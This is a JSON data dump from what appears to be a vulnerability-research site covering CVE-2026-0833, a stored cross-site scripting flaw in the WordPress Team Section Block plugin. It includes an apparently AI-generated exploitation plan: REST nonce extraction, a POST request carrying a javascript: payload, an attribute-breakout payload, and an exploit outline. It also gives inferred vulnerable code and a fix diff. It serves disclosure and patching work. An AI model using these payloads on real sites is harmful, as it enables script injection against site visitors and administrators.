[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fxC6u_kUY7qoJGt3wyd-PkgUjqmc0OjCN3PhTMKgoWsM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-0833","team-section-block-authenticated-contributor-stored-cross-site-scripting-via-social-network-link","Team Section Block \u003C= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Social Network Link","The Team Section Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user-supplied social network link URLs. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","team-section",null,"\u003C=2.0.0","2.0.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-16 17:54:29","2026-01-17 06:42:19",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6348b119-a0dc-40ef-ae62-1de86dcefac7?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-0833\n\n## 1. Vulnerability Summary\nThe **Team Section Block** plugin (versions \u003C= 2.0.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to sanitize or escape user-provided URLs for social network links within the \"Team Section\" Gutenberg block. When a user with Contributor-level permissions or higher adds a team member and provides a malicious URL (e.g., using the `javascript:` protocol), the script is stored in the post content and executed in the context of any user (including administrators) who views the published post or a preview.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts` (WordPress REST API) or `\u002Fwp-admin\u002Fpost.php`.\n*   **Vulnerable Parameter:** The block's attribute containing social network links (e.g., `socialLinks`, `link`, or `url` within the block's JSON metadata).\n*   **Authentication Required:** Authenticated user with **Contributor** role or higher.\n*   **Preconditions:** The plugin must be active, and the attacker must have permission to create or edit posts.\n\n## 3. Code Flow (Inferred)\n1.  **Input Registration:** The plugin registers a Gutenberg block using `register_block_type` in PHP or `registerBlockType` in JavaScript.\n2.  **Data Storage:** When a post is saved, the block's attributes (including the social media URLs) are serialized into the `post_content` within HTML comments: `\u003C!-- wp:team-section\u002Fmember {\"socialLinks\":[{\"url\":\"PAYLOAD\"}]} -->`.\n3.  **Rendering (Sink):**\n    *   If the block is dynamic: The `render_callback` function (e.g., `render_team_member_block`) retrieves the `url` attribute and echoes it directly into an `\u003Ca>` tag's `href` attribute without using `esc_url()`.\n    *   If the block is static: The `save()` function in the block's JavaScript produces HTML where the `href` is not properly sanitized during the editor's save process.\n4.  **Execution:** A victim views the post; the browser interprets the `javascript:` protocol in the `href` or breaks out of the attribute using quotes (e.g., `\" onmouseover=\"alert(1)`).\n\n## 4. Nonce Acquisition Strategy\nSince the attack requires Contributor-level access to save a post via the REST API, a valid REST API nonce (`wp_rest`) is required.\n\n1.  **Identify Shortcode\u002FBlock:** The plugin uses the block name (likely `team-section\u002Fteam-section` or `team-section\u002Fblock`).\n2.  **Setup Page:** Create a temporary page with the block to ensure all scripts and nonces are loaded.\n    *   `wp post create --post_type=page --post_status=publish --post_content='\u003C!-- wp:team-section\u002Fblock \u002F-->' --post_author=[CONTRIBUTOR_ID]`\n3.  **Extraction:**\n    *   Navigate to `\u002Fwp-admin\u002Fpost-new.php` or the created page as the Contributor user.\n    *   Use `browser_eval` to extract the REST nonce from the WordPress heartbeats or localized scripts:\n        *   `browser_eval(\"wpApiSettings.nonce\")`\n        *   Alternatively, look for the `_wpnonce` in the settings: `browser_eval(\"wp.utils.getCookie('wp-auth')\")` (though `wpApiSettings` is the standard for REST).\n\n## 5. Exploitation Strategy\nThe goal is to create a post containing a Team Section Block with an XSS payload in a social link.\n\n**Step 1: Authenticate**\nLogin as a Contributor user.\n\n**Step 2: Obtain REST Nonce**\nAccess the WordPress dashboard and extract the `_wpnonce` for the REST API.\n\n**Step 3: Submit Malicious Post**\nSend a POST request to the REST API to create a post with the XSS payload.\n\n*   **URL:** `http:\u002F\u002F[TARGET]\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n*   **Method:** `POST`\n*   **Headers:**\n    *   `Content-Type: application\u002Fjson`\n    *   `X-WP-Nonce: [EXTRACTED_NONCE]`\n*   **Body (JSON):**\n```json\n{\n  \"title\": \"Meet the Team\",\n  \"status\": \"publish\",\n  \"content\": \"\u003C!-- wp:team-section\u002Fblock {\\\"members\\\":[{\\\"name\\\":\\\"Innocent Member\\\",\\\"socials\\\":[{\\\"icon\\\":\\\"fa-facebook\\\",\\\"url\\\":\\\"javascript:alert(document.domain)\\\"}]}]} -->\\n\u003Cdiv class=\\\"wp-block-team-section-block\\\">...\u003C\u002Fdiv>\\n\u003C!-- \u002Fwp:team-section\u002Fblock -->\"\n}\n```\n*(Note: The exact block name `team-section\u002Fblock` and attribute structure `members` -> `socials` -> `url` should be verified by inspecting the plugin's `block.json` or JS files.)*\n\n**Step 4: Trigger XSS**\nNavigate to the permalink of the newly created post. Click or hover over the social media icon (depending on the payload).\n\n## 6. Test Data Setup\n1.  **Role:** Ensure a user with the `contributor` role exists.\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2.  **Plugin Configuration:** No specific settings are usually required other than the plugin being active.\n\n## 7. Expected Results\n*   The REST API should return a `201 Created` status.\n*   When viewing the post, the HTML source for the social link should look like:\n    `\u003Ca href=\"javascript:alert(document.domain)\" ...>`\n*   If `esc_url()` was used, the `href` would be empty or correctly escaped, preventing execution.\n\n## 8. Verification Steps\n1.  **Check Post Content via CLI:**\n    `wp post get [POST_ID] --field=post_content`\n    Confirm the `javascript:` payload exists in the raw content.\n2.  **Check Frontend Output:**\n    Use `http_request` to fetch the post and grep for the payload:\n    `grep \"javascript:alert\" response_body.html`\n\n## 9. Alternative Approaches\n*   **Attribute Breakout:** If the `javascript:` protocol is blocked by a weak filter, try breaking out of the `href` attribute:\n    *   Payload: `\\\" onmouseover=\\\"alert(1)`\n    *   Resulting HTML: `\u003Ca href=\"\\\" onmouseover=\\\"alert(1)\" ...>`\n*   **Classic Editor:** If the REST API is restricted, try a classic `admin-ajax.php` or `post.php` submission by mimicking a form save, though Gutenberg is the primary target for this plugin.","The Team Section Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to 2.0.0. Authenticated attackers with Contributor-level permissions can inject arbitrary scripts into posts via social network link attributes that lack proper sanitization (esc_url), leading to execution when users view or preview the content.","\u002F\u002F Inferred from research plan code flow analysis\n\u002F\u002F Likely located in the block's rendering logic (PHP or JS save function)\n\nfunction render_team_member_block($attributes) {\n    $socials = isset($attributes['socialLinks']) ? $attributes['socialLinks'] : [];\n    $html = '\u003Cdiv class=\"team-social-links\">';\n    \n    foreach ($socials as $social) {\n        \u002F\u002F VULNERABLE: The URL attribute is echoed directly into href without esc_url()\n        $html .= '\u003Ca href=\"' . $social['url'] . '\" class=\"social-icon\">\u003Ci class=\"' . $social['icon'] . '\">\u003C\u002Fi>\u003C\u002Fa>';\n    }\n    \n    $html .= '\u003C\u002Fdiv>';\n    return $html;\n}","--- a\u002Fteam-section\u002Frender.php\n+++ b\u002Fteam-section\u002Frender.php\n@@ -5,7 +5,7 @@\n     $html = '\u003Cdiv class=\"team-social-links\">';\n     foreach ($socials as $social) {\n-        $html .= '\u003Ca href=\"' . $social['url'] . '\" class=\"social-icon\">\u003Ci class=\"' . $social['icon'] . '\">\u003C\u002Fi>\u003C\u002Fa>';\n+        $html .= '\u003Ca href=\"' . esc_url($social['url']) . '\" class=\"social-icon\">\u003Ci class=\"' . esc_attr($social['icon']) . '\">\u003C\u002Fi>\u003C\u002Fa>';\n     }\n     $html .= '\u003C\u002Fdiv>';","1. Authenticate to the WordPress site as a user with Contributor-level access or higher.\n2. Create a new post or edit an existing one to include the 'Team Section' Gutenberg block.\n3. Within the block settings for a team member, locate the social network link fields.\n4. Input a malicious payload into a URL field, such as `javascript:alert(document.domain)` or an attribute breakout like `\" onmouseover=\"alert(1)`.\n5. Save the post as a draft or publish it. \n6. The payload is stored in the post content. When an administrator or other user views the post, the script executes when they click the social icon or trigger the event handler.","gemini-3-flash-preview","2026-05-05 07:09:35","2026-05-05 07:11:33",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.0.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fteam-section\u002Ftags\u002F2.0.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fteam-section.2.0.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fteam-section\u002Ftags\u002F2.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fteam-section.2.0.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fteam-section\u002Ftags"]